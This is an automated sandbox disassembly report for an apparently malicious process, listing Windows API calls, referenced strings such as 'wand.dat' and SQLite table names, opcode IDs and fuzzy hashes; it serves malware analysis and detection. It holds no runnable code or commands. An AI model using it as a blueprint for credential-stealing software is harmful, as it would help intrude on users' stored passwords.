                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                APIs
                                • memset.MSVCRT ref: 0040D58D
                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ChildEnumTextWindowWindowsmemset
                                • String ID: caption
                                • API String ID: 1523050162-4135340389
                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                APIs
                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                • String ID: MS Sans Serif
                                • API String ID: 210187428-168460110
                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClassName_wcsicmpmemset
                                • String ID: edit
                                • API String ID: 2747424523-2167791130
                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID: SHAutoComplete$shlwapi.dll
                                • API String ID: 3150196962-1506664499
                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memcmp
                                • String ID:
                                • API String ID: 3384217055-0
                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                APIs
                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                • GetMenu.USER32(?), ref: 00410F8D
                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                • String ID:
                                • API String ID: 1889144086-0
                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                • GetLastError.KERNEL32 ref: 0041810A
                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                • String ID:
                                • API String ID: 1661045500-0
                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                APIs
                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                • memcpy.MSVCRT ref: 0042EC7A
                                Strings
                                • virtual tables may not be altered, xrefs: 0042EBD2
                                • Cannot add a column to a view, xrefs: 0042EBE8
                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                • API String ID: 1297977491-2063813899
                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                APIs
                                • memset.MSVCRT ref: 0040560C
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.*$dat$wand.dat
                                • API String ID: 2618321458-1828844352
                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • wcslen.MSVCRT ref: 00410C74
                                • _wtoi.MSVCRT ref: 00410C80
                                • _wcsicmp.MSVCRT ref: 00410CCE
                                • _wcsicmp.MSVCRT ref: 00410CDF
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                • String ID:
                                • API String ID: 1549203181-0
                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                APIs
                                • memset.MSVCRT ref: 00412057
                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                • GetKeyState.USER32(00000010), ref: 0041210D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                • String ID:
                                • API String ID: 3550944819-0
                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                APIs
                                • wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                • memcpy.MSVCRT ref: 0040A94F
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                APIs
                                • wcslen.MSVCRT ref: 0040B1DE
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                • memcpy.MSVCRT ref: 0040B248
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: @
                                • API String ID: 3510742995-2766056989
                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID:
                                • API String ID: 1865533344-0
                                • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                APIs
                                • strlen.MSVCRT ref: 0040B0D8
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                • memcpy.MSVCRT ref: 0040B159
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                APIs
                                • memset.MSVCRT ref: 004144E7
                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                • memset.MSVCRT ref: 0041451A
                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                • String ID:
                                • API String ID: 1127616056-0
                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: sqlite_master
                                • API String ID: 438689982-3163232059
                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                APIs
                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                • wcscpy.MSVCRT ref: 00414DF3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                • String ID:
                                • API String ID: 3917621476-0
                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                APIs
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                • _snwprintf.MSVCRT ref: 00410FE1
                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                • _snwprintf.MSVCRT ref: 0041100C
                                • wcscat.MSVCRT ref: 0041101F
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                • String ID:
                                • API String ID: 822687973-0
                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                • malloc.MSVCRT ref: 00417459
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                • RegisterClassW.USER32(?), ref: 00412428
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule$ClassCreateRegisterWindow
                                • String ID:
                                • API String ID: 2678498856-0
                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$Item
                                • String ID:
                                • API String ID: 3888421826-0
                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                APIs
                                • memset.MSVCRT ref: 00417B7B
                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                • GetLastError.KERNEL32 ref: 00417BB5
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ErrorLastLockUnlockmemset
                                • String ID:
                                • API String ID: 3727323765-0
                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
